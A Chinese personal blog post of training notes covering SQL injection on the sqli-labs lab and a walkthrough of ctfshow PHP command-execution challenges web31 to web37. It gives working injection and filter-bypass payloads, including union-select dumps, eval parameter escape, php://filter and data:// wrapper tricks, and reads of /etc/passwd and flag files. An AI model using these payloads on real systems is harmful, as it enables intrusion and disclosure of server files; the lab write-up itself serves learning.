<!DOCTYPE html><html class="appearance-auto" lang="zh-CN"><head><meta charset="UTF-8"><title>实训7.6</title><meta name="description" content="What doesn't kill me makes me stronger."><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/images/favicon.png"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="2021/7/6
sql注入sqlmap使用需要python2.7环境

需要python时说明python2或者Python3

输入python sqlmap.py+命令行
sqli-labsless-1字符型注入
url/?id=1&amp;#39; order by 4#
 直接输入无效就用url编码（要构造#闭合）
url/?id=1%27%20order%20by%204%23
依次尝试 验证有3列

获取数据库名称
url/?id=&amp;#39; union select null,database(),3#

获取全部数据库名称
url/?id=&amp;#39; union select null,(select group_concat(schema_name) from information_schem.."><meta name="generator" content="Hexo 5.4.0"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">HildegardeZ's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">实训7.6</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">点击返回顶部</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="toc-text">sql注入</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#sqlmap%E4%BD%BF%E7%94%A8"><span class="toc-text">sqlmap使用</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sqli-labs"><span class="toc-text">sqli-labs</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#less-1"><span class="toc-text">less-1</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-text">命令执行</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%EF%BC%9A-%E5%B0%86%E7%94%A8%E6%88%B7%E8%BE%93%E5%85%A5%E4%BD%9C%E4%B8%BA%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E7%9A%84%E5%8F%82%E6%95%B0%E6%8B%BC%E6%8E%A5%E5%88%B0%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E4%B8%AD"><span class="toc-text">代码执行： 将用户输入作为系统命令的参数拼接到系统命令中</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%9A%E5%B0%86%E7%94%A8%E6%88%B7%E8%BE%93%E5%85%A5%E4%BD%9C%E4%B8%BA%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E7%9A%84%E5%8F%82%E6%95%B0%E6%8B%BC%E6%8E%A5%E5%88%B0%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E4%B8%AD"><span class="toc-text">命令执行：将用户输入作为系统命令的参数拼接到系统命令中</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web31"><span class="toc-text">web31</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web32"><span class="toc-text">web32</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web33"><span class="toc-text">web33</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web34"><span class="toc-text">web34</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web35"><span class="toc-text">web35</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web36"><span class="toc-text">web36</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#web37"><span class="toc-text">web37</span></a></li></ol></li></ol></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/%E5%AE%9E%E8%AE%AD2021"><i class="tag post-item-tag">实训2021</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">实训7.6</h1><time class="has-text-grey" datetime="2021-07-13T01:28:00.000Z">2021-07-13</time><article class="mt-2 post-content"><p><em>2021/7/6</em></p>
<h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><h5 id="sqlmap使用"><a href="#sqlmap使用" class="headerlink" title="sqlmap使用"></a>sqlmap使用</h5><p>需要python2.7环境</p>
<ul>
<li>需要python时说明python2或者Python3</li>
</ul>
<p>输入<code>python sqlmap.py</code>+命令行</p>
<h4 id="sqli-labs"><a href="#sqli-labs" class="headerlink" title="sqli-labs"></a>sqli-labs</h4><h5 id="less-1"><a href="#less-1" class="headerlink" title="less-1"></a>less-1</h5><p>字符型注入</p>
<p><code>url/?id=1&#39; order by 4#</code></p>
<p><em> 直接输入无效就用url编码（要构造#闭合）</em></p>
<p><code>url/?id=1%27%20order%20by%204%23</code></p>
<p>依次尝试 验证有3列</p>
<p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706102005600.png" alt="image-20210706102005600"></p>
<p>获取数据库名称</p>
<p><code>url/?id=&#39; union select null,database(),3#</code></p>
<p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706101910261.png" alt="image-20210706101910261"></p>
<p>获取全部数据库名称</p>
<p><code>url/?id=&#39; union select null,(select group_concat(schema_name) from information_schema.schemata),null#</code></p>
<p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706104513276.png" alt="image-20210706104513276"></p>
<p><code>url/?id=&#39;union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema=database())#</code></p>
<p>tamadexiebuxiaqulekaishikanyufa</p>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p><em><em>命令执行和代码执行的区别</em></em></p>
<h5 id="代码执行：-将用户输入作为系统命令的参数拼接到系统命令中"><a href="#代码执行：-将用户输入作为系统命令的参数拼接到系统命令中" class="headerlink" title="代码执行： 将用户输入作为系统命令的参数拼接到系统命令中"></a>代码执行： 将用户输入作为系统命令的参数拼接到系统命令中</h5><p>代码执行漏洞是把代码注入到Web服务器中执行，而命令执行漏洞执行的系统命令。主要有两种产生原因：代码执行函数和动态函数执行，在php中还存在双引号执行的情况。常见的导致代码执行的函数有：eval()、assert()、preg_replace()、call_user_func()、array_map()</p>
<h5 id="命令执行：将用户输入作为系统命令的参数拼接到系统命令中"><a href="#命令执行：将用户输入作为系统命令的参数拼接到系统命令中" class="headerlink" title="命令执行：将用户输入作为系统命令的参数拼接到系统命令中"></a>命令执行：将用户输入作为系统命令的参数拼接到系统命令中</h5><p>相比较代码执行漏洞，命令执行漏洞的危害更大，它所执行的命令会继承WebServer的权限，也就是说可以任意读取、修改、执行Web目录下的任何文件。能够进行命令执行的php函数一共有七个，分别是：system()、exec()、shell_exec()、passthru()、pcntl_exec()、popen()、proc_open()，除函数外，倒引号(这里用反向单引号)内的内容也可以进行命令执行</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/richardlee97/p/10627432.html">https://www.cnblogs.com/richardlee97/p/10627432.html</a></p>
<h5 id="web31"><a href="#web31" class="headerlink" title="web31"></a>web31</h5><p>过滤逐渐变态</p>
<p><code>   if(!preg_match(&quot;/flag|system|php|cat|sort|shell|\.| |\&#39;/i&quot;, $c))&#123;eval($c);&#125;</code></p>
<p><em>//模式分隔符后的”i”标记这是一个大小写不敏感的搜索</em></p>
<ul>
<li><p>/?c=show_source**(<strong>next</strong>(<strong>array_reverse</strong>(<strong>scandir</strong>(<strong>pos</strong>(**localeconv()))))); </p>
<p>这个是真离谱</p>
</li>
<li><p>/?c=echo%09<code>tac%09*</code>; //注意绕过空格 %20(space)可以用%09(tab)代替</p>
</li>
<li><p>ctfshow标答</p>
<ul>
<li>url//?c=eval($_GET[1]);&amp;1=phpinfo();//让1这个参数逃逸出去 所有被ban的字符都可以使用</li>
</ul>
<ul>
<li>url/?c=eval($_GET[1]);&amp;1=system(‘cat flag.php’);</li>
<li>查看源代码 //用tac可以不用查看源代码直接查看</li>
</ul>
</li>
</ul>
<h5 id="web32"><a href="#web32" class="headerlink" title="web32"></a>web32</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706170453734.png" alt="image-20210706170453734"></p>
<ul>
<li><p>url/?c=include%0a$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</p>
<ul>
<li><p>因为分号引号空格括号等等都被ban了 用include代替（文件包含）%0a代表换行</p>
</li>
<li><p>get实现参数逃逸 （可以先用&amp;1=/etc/passwd验证）</p>
</li>
<li><p>php://filter/convert.base64-encode/resource=路劲hackbar插件里有（LFI–Using wrappers)</p>
</li>
<li><p>得到一长串字符 hackbar base64解码得到flag</p>
</li>
</ul>
</li>
</ul>
<h5 id="web33"><a href="#web33" class="headerlink" title="web33"></a>web33</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706192944994.png" alt="image-20210706192944994"></p>
<p>多屏蔽了一个双引号</p>
<ul>
<li><p>上一题的方法依然可用 发现甚至可以不加%0a换行</p>
</li>
<li><ul>
<li><p>url/?c=require$_GET[1]?&gt;&amp;1=/etc/passwd 验证可行</p>
</li>
<li><p>/?c=require$_GET[1]?&gt;&amp;1=php://filter/convert.base64-encode/resource=flag.php</p>
</li>
<li><p>得到字符串 base64转码 得到flag</p>
</li>
</ul>
</li>
</ul>
<ol>
<li><p><em>require() 语句的性能与 include() 相类似，都是包括并运行指定文件。require() 和 include() 语句是语言结构，不是真正的函数，可以像 php 中其他的语言结构一样，例如 echo() 可以使用 echo(“ab”) 形式，也可以使用 echo “abc” 形式输出字符串 abc。require() 和 include() 语句也可以不加圆括号而直接加参数。</em></p>
</li>
<li><p><em>GET里的参数外的引号可以不加 向下兼容</em></p>
</li>
</ol>
<h5 id="web34"><a href="#web34" class="headerlink" title="web34"></a>web34</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706195352479.png" alt="image-20210706195352479"></p>
<h5 id="web35"><a href="#web35" class="headerlink" title="web35"></a>web35</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706200107010.png" alt="image-20210706200107010"></p>
<h5 id="web36"><a href="#web36" class="headerlink" title="web36"></a>web36</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706200359822.png" alt="image-20210706200359822"></p>
<p>同上。35新增屏蔽了左尖括号&lt; 没有影响</p>
<p>36新增屏蔽数字 –&gt;把参数1换成字母就行</p>
<h5 id="web37"><a href="#web37" class="headerlink" title="web37"></a>web37</h5><p><img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210706201423756.png" alt="image-20210706201423756"></p>
<p>用了include包含参数c 这意味着代码不会直接执行</p>
<p>比如``url/?c=_GET[1]&amp;1=flag.php`(不需要分号)无法执行</p>
<p><em>eval() — 把字符串作为PHP代码执行 <code>return</code> 语句会立即中止当前字符串的执行。</em></p>
<p><em>php include($file) 和 eval(get_file_contents($file)) 作用相似 </em></p>
<ul>
<li><p>url/?c=?page=php://filter/convert.base64-encode/resource=flag.php 不行 包含flag和php</p>
</li>
<li><p>url/?c=data://text/plain,<?php phpinfo();?> <img src="/2021/07/13/%E5%AE%9E%E8%AE%AD7-6/image-20210707091656708.png" alt="image-20210707091656708"></p>
<ul>
<li><p>data伪协议 将后面语句作为代码执行 –&gt; 验证可行</p>
</li>
<li><p>url/?c=data://text/plain,<?php system("tac fla?.php");?></p>
</li>
<li><p>或者 url/?c=data://text/plain,<?php system("mv fla?.php 1.txt");?> 然后url/1.txt   <em>//必要时可以base64编码</em></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/kuaile1314/p/11897097.html">伪协议与文件包含</a></p>
</li>
</ul>
</li>
</ul>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><a class="button is-default" href="/2021/07/13/%E5%AE%9E%E8%AE%AD7-7/" title="实训7.7"><i class="iconfont icon-prev mr-2 has-text-grey"></i><span class="has-text-weight-semibold">上一页: 实训7.7</span></a><a class="button is-default" href="/2021/07/13/%E5%AE%9E%E8%AE%AD7-5/" title="实训7.5"><span class="has-text-weight-semibold">下一页: 实训7.5</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="Haojen/Claudia-theme-blog" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><a title="twitter" target="_blank" rel="noopener nofollow" href="//twitter.com//"><i class="iconfont icon-twitter"></i></a><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/HildegardeZ"><i class="iconfont icon-github"></i></a><!-- Ins--><a title="instagram" target="_blank" rel="noopener nofollow" href="//www.instagram.com//"><i class="iconfont icon-ins"></i></a><!-- RSS--><!-- 知乎--><!-- 领英--><!-- 脸书--><a title="facebook" target="_blank" rel="noopener nofollow" href="//www.facebook.com//"><i class="iconfont icon-tian7_facebook"></i></a></section><p><span>Copyright ©</span><span> HildegardeZ 2022</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/post.js"></script></body></html>